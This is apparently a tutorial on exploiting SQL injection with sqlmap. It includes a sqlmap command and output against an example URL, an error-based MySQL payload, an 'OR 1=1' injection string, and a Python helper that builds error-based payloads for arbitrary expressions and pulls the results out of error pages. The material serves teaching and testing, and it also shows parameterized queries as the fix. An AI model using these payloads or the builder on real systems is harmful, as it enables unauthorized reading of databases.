How to use sqlmap to exploit a vulnerable web application and see what can be done with such a tool.
Let’s say you have a url like this
Suppose this site is prone to SQL injection because the developer did not properly escape the parameter id before putting it into a query. This can be tested simply by trying to open the url
We just appended a single quote to the parameter value. If the page now shows a database error, the quote broke the SQL syntax, which means the parameter went into the query unescaped. One caveat: no visible error does not mean the parameter is safe. Many applications hide database errors, and the injection may still show up as a difference in page content or response time, which is exactly what sqlmap's boolean-based and time-based blind techniques look for.
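To make the single-quote test concrete, here is an added example in Python (not code from the original page) using an in-memory SQLite database: a lookup that pastes the id parameter into the SQL text the way the vulnerable section.php is described to, beside a parameterized lookup. The table, its two rows and the probe function are constructed for this example.

```python
import sqlite3

# Constructed for this example: a tiny in-memory stand-in for the site's database.
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE sections (id INTEGER PRIMARY KEY, title TEXT)")
    con.executemany("INSERT INTO sections VALUES (?, ?)",
                    [(51, "About us"), (52, "Contact")])
    return con

def lookup_vulnerable(con, id_param):
    # The mistake the page describes: the parameter is pasted into the query text,
    # so a quote inside it becomes SQL syntax instead of data.
    sql = "SELECT title FROM sections WHERE id = '%s'" % id_param
    return con.execute(sql).fetchall()

def lookup_safe(con, id_param):
    # Parameterized query: the driver sends the value separately from the SQL text,
    # so a quote in the value can never terminate the string literal.
    return con.execute("SELECT title FROM sections WHERE id = ?", (id_param,)).fetchall()

def probe(lookup, id_param):
    """Run one id value through a lookup and report ('ok', rows) or ('error', msg).

    This is the page's single-quote test expressed in code: a database error
    on "51'" means the quote reached the SQL parser.
    """
    con = make_db()
    try:
        return ("ok", lookup(con, id_param))
    except sqlite3.Error as exc:
        return ("error", str(exc))
    finally:
        con.close()

if __name__ == "__main__":
    for value in ("51", "51'", "9999' OR '1'='1"):
        print(repr(value),
              "vulnerable:", probe(lookup_vulnerable, value),
              "safe:", probe(lookup_safe, value))
```

The third value shows why the error matters: once the quote is live SQL, `9999' OR '1'='1` turns a lookup of a non-existent id into a query that returns every row, while the parameterized version simply finds nothing.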
Hacking with sqlmap
Now it's time to move on to sqlmap to hack such urls. sqlmap is a Python script, so it is run from the terminal with the Python interpreter:
python sqlmap.py -u "http://www.example.com/section.php?id=51"
This is the simplest sqlmap command. With only -u given, sqlmap tests each parameter in the url for injection and, once it finds one, fingerprints the back-end DBMS, the web server and the operating system. The output can look something like this:
[*] starting at 12:10:33
[12:10:33] [INFO] resuming back-end DBMS 'mysql'
[12:10:34] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
[12:10:37] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
There you are: sqlmap has found the injection point (an error-based injection in the id parameter) and identified the operating system, the web server and the database, along with version information. Note the lines "resuming back-end DBMS" and "0 HTTP(s) requests": this run picked up results saved in sqlmap's session file from an earlier run against the same target. On a fresh run sqlmap sends a large number of requests while testing the parameter, which is noisy and will show up in the target's web server logs.
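The payload in the output above is sqlmap's MySQL error-based technique. The following added example (my code, not sqlmap's) rebuilds that payload around an arbitrary expression and shows the other half of the technique, reading the injected value back out of the database error that the page echoes. The markers ':swl:' and ':zve:' are decoded from the two hex literals in the page's payload; the sample error page and the version string inside it are constructed for the example.

```python
import re

# The two marker strings sqlmap placed around the injected expression in the
# payload above; the payload carries them as the hex literals 0x3a73776c3a and
# 0x3a7a76653a so that no quote characters are needed inside the injection.
PREFIX = bytes.fromhex("3a73776c3a").decode()   # ':swl:'
SUFFIX = bytes.fromhex("3a7a76653a").decode()   # ':zve:'

def hex_literal(s):
    """Encode a string as a MySQL hex literal (0x...), as the payload does."""
    return "0x" + s.encode().hex()

def error_based_payload(expr, seed=1489):
    """Wrap a MySQL expression in the duplicate-key trick used by the payload above.

    FLOOR(RAND(0)*2) with the fixed seed yields the known sequence 0,1,1,0,1,1,...
    GROUP BY on a string built from it makes MySQL insert the same group key
    twice into its temporary table, and the resulting 'Duplicate entry' error
    echoes that key, i.e. the marker-wrapped value of expr, back to the client.
    With the page's CASE expression this reproduces the page's payload exactly.
    """
    return (
        f"id=51 AND (SELECT {seed} FROM(SELECT COUNT(*),CONCAT({hex_literal(PREFIX)},"
        f"({expr}),{hex_literal(SUFFIX)},FLOOR(RAND(0)*2))x "
        f"FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
    )

_MARKED = re.compile(re.escape(PREFIX) + r"(.*?)" + re.escape(SUFFIX), re.S)

def extract_from_error(response_body):
    """Pull the value between the markers out of a page that echoed the DB error.

    Returns None when the markers are absent (error hidden, or no injection),
    which is the case where sqlmap has to fall back to blind techniques.
    """
    m = _MARKED.search(response_body)
    return m.group(1) if m else None

# Constructed sample: what the echoed error looks like when expr is @@version.
# The version string is made up for this example.
SAMPLE_ERROR_PAGE = (
    "<html><body>Query failed: Duplicate entry ':swl:5.5.28:zve:1' "
    "for key 'group_key'</body></html>"
)

if __name__ == "__main__":
    print(error_based_payload("@@version"))
    print(extract_from_error(SAMPLE_ERROR_PAGE))
```

The CASE expression in the page's payload is sqlmap confirming the injection point: it asks the server whether 1489=1489 and checks that the answer (1) comes back inside the markers. Once that works, any expression such as @@version or a column read from another table can be substituted for the CASE, which is how the version and the later data dumps are obtained from a single echoed error per value.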